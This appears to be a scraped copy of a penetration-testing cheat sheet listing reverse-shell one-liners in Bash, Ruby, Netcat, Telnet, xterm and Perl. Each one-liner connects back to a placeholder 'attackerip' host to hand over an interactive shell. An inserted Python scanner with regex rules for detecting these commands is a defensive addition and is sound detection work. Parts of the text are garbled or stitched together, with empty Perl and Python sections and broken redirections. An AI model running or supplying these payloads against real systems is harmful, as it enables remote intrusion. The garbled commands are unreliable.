BSCKDOOR - Reverse Shells One-Liners PDF
If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
[...] your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP port.
Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.
First of all, on your machine, set up a listener, where attackerip is your IP address and 4444 is an arbitrary TCP port unfiltered by the target's firewall:
attacker$ nc -l -v attackerip 4444
Bash
exec /bin/bash 0&0 2>&0
Or:
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
Or:
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
See also Reverse Shell With Bash [http://www.gnucitizen.org/blog/reverse-shell-with-bash/] from the GNUCITIZEN blog [http://www.gnucitizen.org/blog/].
Perl
Ruby
http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html 1/5
4/12/2018 Reverse shells one-liners
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Netcat
Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:
nc -c /bin/sh attackerip 4444
Or:
/bin/sh | nc attackerip 4444
Or:
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p
Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p
Or:
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 # Remember to listen on your machine also on port 4445/tcp
xterm
To catch an incoming xterm, start an open X Server on your system (:1 - which listens on TCP port 6001). One way to do this is with Xnest [http://www.xfree86.org/4.4.0/Xnest.1.html]:
Xnest :1
xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest
xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:
xterm -display attackerip:1
Or:
$ DISPLAY=attackerip:0 xterm
Note that on Solaris the xterm path is usually not in the PATH environment variable, so you need to specify its full path:
/usr/openwin/bin/xterm -display attackerip:1
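As an added defender-side example (not from the original post or its comments): a small Python scanner that runs the patterns behind the Bash, Netcat, Telnet and xterm one-liners above over constructed command-audit lines, flags the matches, and pulls out the remote host and port (an X display :N is mapped to TCP port 6000+N, as the xterm section notes for :1 and 6001). The `uid=<n> cmd=<command>` line shape, the rule names and the 203.0.113.5 address are assumptions made for this example.

```python
import re

# Constructed sample records in an assumed "uid=<n> cmd=<command>" shape,
# standing in for process-audit or shell-history lines. Not from the post;
# the first four mirror its technique families, the last two are benign.
SAMPLE_LINES = [
    "uid=33 cmd=bash -c 'exec 5<>/dev/tcp/203.0.113.5/4444; cat <&5 | while read line; do $line 2>&5 >&5; done'",
    "uid=33 cmd=nc -c /bin/sh 203.0.113.5 4444",
    "uid=33 cmd=rm -f /tmp/p; mknod /tmp/p p && telnet 203.0.113.5 4444",
    "uid=33 cmd=xterm -display 203.0.113.5:1",
    "uid=1000 cmd=nc -zv internal-db 5432",
    "uid=1000 cmd=ls -la /tmp",
]

# Detection rules (rule names are this example's own), one per family above.
RULES = [
    # bash /dev/tcp pseudo-device opened against a host/port
    ("bash-dev-tcp", re.compile(r"/dev/tcp/[^/\s]+/\d+")),
    # netcat invoked with an -e/-c style "run a program" flag (nc -zv must not match)
    ("netcat-exec-flag", re.compile(r"\b(?:nc|netcat)\b[^|;&]*\s-[A-Za-z]*[ce]\b")),
    # a shell piped into a network client, or a client piped into a shell
    ("client-shell-pipe", re.compile(
        r"/bin/(?:ba)?sh\s*\|\s*(?:nc|netcat|telnet)\b"
        r"|\b(?:nc|netcat|telnet)\b[^|]*\|\s*/bin/(?:ba)?sh\b")),
    # named pipe created and immediately wired to a client
    ("fifo-relay", re.compile(r"mknod\s+\S+\s+p\s*&&\s*(?:nc|netcat|telnet)\b")),
    # xterm pointed at a remote X display
    ("xterm-remote-display", re.compile(
        r"(?:DISPLAY=\S+:\d+\s+xterm\b|\bxterm\b.*-display\s+\S+:\d+)")),
]

# Where the remote endpoint sits in each shape of command line.
ENDPOINT_PATTERNS = [
    re.compile(r"/dev/tcp/(?P<host>[^/\s]+)/(?P<port>\d+)"),
    re.compile(r"\b(?:nc|netcat|telnet)\b(?:\s+-\S+|\s+/\S+)*\s+(?P<host>[\w.-]+)\s+(?P<port>\d{1,5})\b"),
]
DISPLAY_PATTERN = re.compile(r"(?:-display\s+|DISPLAY=)(?P<host>[^\s:]+):(?P<display>\d+)")


def scan(lines):
    """Return (line_index, rule_name) for every rule that fires on a line."""
    hits = []
    for idx, line in enumerate(lines):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((idx, name))
    return hits


def extract_endpoint(line):
    """Best-effort (host, tcp_port) the command would connect to, or None."""
    for rx in ENDPOINT_PATTERNS:
        m = rx.search(line)
        if m:
            return m.group("host"), int(m.group("port"))
    m = DISPLAY_PATTERN.search(line)
    if m:
        # X11 display :N is served on TCP port 6000+N, so :1 is 6001
        return m.group("host"), 6000 + int(m.group("display"))
    return None


def alerts(lines):
    """Combine rule hits with the endpoint to block or hunt for."""
    return [{"line": idx, "rule": rule, "endpoint": extract_endpoint(lines[idx])}
            for idx, rule in scan(lines)]


if __name__ == "__main__":
    for a in alerts(SAMPLE_LINES):
        print(f"line {a['line']}: {a['rule']} -> {a['endpoint']}")
```

The rules key on the shape of the command rather than on a specific binary, because the post itself shows the same outbound-shell idea expressed through bash, nc, telnet and xterm; the extracted endpoint is what a responder feeds into egress-filter checks and flow-log searches.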
#!/usr/bin/python
# imports here
import socket,subprocess
Cheers,
@DGleebits
print $sock eval(<$sock>) while ($sock ||= IO::Socket::INET->new(PeerAddr => "127.0.0.1", PeerPort => "23666"))
Netcat
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p 2>&1
Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p 2>&1